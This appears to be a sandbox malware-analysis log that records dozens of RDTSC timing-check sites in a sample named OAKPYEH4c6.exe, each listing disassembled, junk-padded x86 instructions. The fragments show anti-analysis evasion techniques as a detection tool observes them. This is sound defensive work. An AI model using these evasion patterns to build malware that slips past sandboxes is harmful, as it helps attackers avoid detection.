Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1760EE5 second address: 1760F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F33985001DEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 ja 00007F33985001E0h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F33985001DDh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1760F2D second address: 1760F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1760F31 second address: 1760F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176106B second address: 176106F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176106F second address: 17610A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F33985001E8h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jg 00007F33985001D6h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17610A1 second address: 17610A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1768A99 second address: 1768A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1768A9F second address: 1768AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B58Fh 0x00000009 jmp 00007F3398F1B591h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1768AC8 second address: 1768AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F33985001D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1768AD2 second address: 1768AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B598h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1768D93 second address: 1768D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17690B9 second address: 17690D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F3398F1B58Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jno 00007F3398F1B586h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17690D0 second address: 17690D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17690D6 second address: 17690DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1769209 second address: 1769235 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33985001D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F33985001DCh 0x00000011 jmp 00007F33985001DFh 0x00000016 popad 0x00000017 push ebx 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176938D second address: 1769396 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176CAF9 second address: 176CB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D3AD second address: 176D3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D49F second address: 176D4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D4B2 second address: 176D4C9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F3398F1B586h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D4C9 second address: 176D4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D839 second address: 176D84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 js 00007F3398F1B59Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D84B second address: 176D84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D8B1 second address: 176D8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176D8B6 second address: 176D8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176E907 second address: 176E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B591h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3398F1B599h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176E938 second address: 176E93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172D829 second address: 172D82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172D82D second address: 172D831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17736C6 second address: 17736D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F3398F1B594h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172D831 second address: 172D83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1776E00 second address: 1776E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F3398F1B588h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 adc bh, FFFFFFA4h 0x00000024 push 00000000h 0x00000026 xor dword ptr [ebp+1246CCF7h], ecx 0x0000002c push 00000000h 0x0000002e ja 00007F3398F1B58Ch 0x00000034 mov edi, esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1776E48 second address: 1776E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1776E4D second address: 1776E57 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3398F1B58Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17760C5 second address: 17760E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1776FB6 second address: 1776FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1779D9B second address: 1779DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33985001E2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1777F3F second address: 1777FD5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F3398F1B588h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1244C626h], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F3398F1B588h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e pushad 0x0000004f movzx esi, cx 0x00000052 popad 0x00000053 adc bx, 19C0h 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f mov ebx, dword ptr [ebp+122D35A3h] 0x00000065 mov eax, dword ptr [ebp+122D0249h] 0x0000006b mov dword ptr [ebp+122D35A3h], ebx 0x00000071 push FFFFFFFFh 0x00000073 sub dword ptr [ebp+122D1932h], eax 0x00000079 add dword ptr [ebp+12479E66h], edi 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1777FD5 second address: 1777FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1778F41 second address: 1778F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1778F45 second address: 1778FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F33985001D8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 movzx edi, di 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov ebx, edx 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov edi, dword ptr [ebp+122D1A3Eh] 0x0000003b mov eax, dword ptr [ebp+122D07E5h] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007F33985001D8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b movsx edi, ax 0x0000005e push FFFFFFFFh 0x00000060 xor dword ptr [ebp+122D33B2h], eax 0x00000066 nop 0x00000067 pushad 0x00000068 jmp 00007F33985001E1h 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1778FCA second address: 1778FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1779FA9 second address: 1779FCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1779FCA second address: 1779FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC07 second address: 177CC11 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33985001DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC11 second address: 177CC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F3398F1B588h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D180Ah], esi 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F3398F1B588h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 add dword ptr [ebp+122D1E5Bh], esi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177BFE5 second address: 177BFEF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F33985001D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC6F second address: 177CC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177BFEF second address: 177C000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC73 second address: 177CC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC77 second address: 177CC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC7D second address: 177CC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B58Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC94 second address: 177CC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177CC98 second address: 177CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177DBC5 second address: 177DBCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F33985001D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177EBAD second address: 177EC3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jl 00007F3398F1B597h 0x00000011 pop esi 0x00000012 nop 0x00000013 push eax 0x00000014 mov bx, ax 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a or ebx, dword ptr [ebp+122D2A4Bh] 0x00000020 mov edi, dword ptr [ebp+122D3346h] 0x00000026 push 00000000h 0x00000028 or edi, 7954E900h 0x0000002e jmp 00007F3398F1B597h 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b jmp 00007F3398F1B594h 0x00000040 popad 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jng 00007F3398F1B586h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177FC17 second address: 177FC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177FC22 second address: 177FC9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F3398F1B58Eh 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D3812h], edx 0x00000015 mov dword ptr [ebp+12479EB0h], ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F3398F1B588h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 jmp 00007F3398F1B594h 0x0000003c call 00007F3398F1B590h 0x00000041 mov di, cx 0x00000044 pop ebx 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177FC9A second address: 177FCAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 177FCAA second address: 177FCB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1782A72 second address: 1782A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17839E2 second address: 1783A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edi 0x0000000a jno 00007F3398F1B58Ch 0x00000010 pop edi 0x00000011 nop 0x00000012 call 00007F3398F1B597h 0x00000017 and bx, CB8Dh 0x0000001c pop ebx 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D3504h], ecx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F3398F1B588h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov bx, 6DEBh 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 jmp 00007F3398F1B592h 0x0000004d pop eax 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1782CDA second address: 1782CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1783BE2 second address: 1783BE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1783BE8 second address: 1783BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F33985001D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1787024 second address: 1787028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1787028 second address: 178702C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1728744 second address: 1728748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179498D second address: 17949C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001DBh 0x00000007 jmp 00007F33985001DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F33985001E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jbe 00007F33985001D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794B26 second address: 1794B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C52 second address: 1794C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C56 second address: 1794C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C5A second address: 1794C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F33985001E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C68 second address: 1794C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3398F1B586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C72 second address: 1794C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1794C78 second address: 1794C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 179684F second address: 1796853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
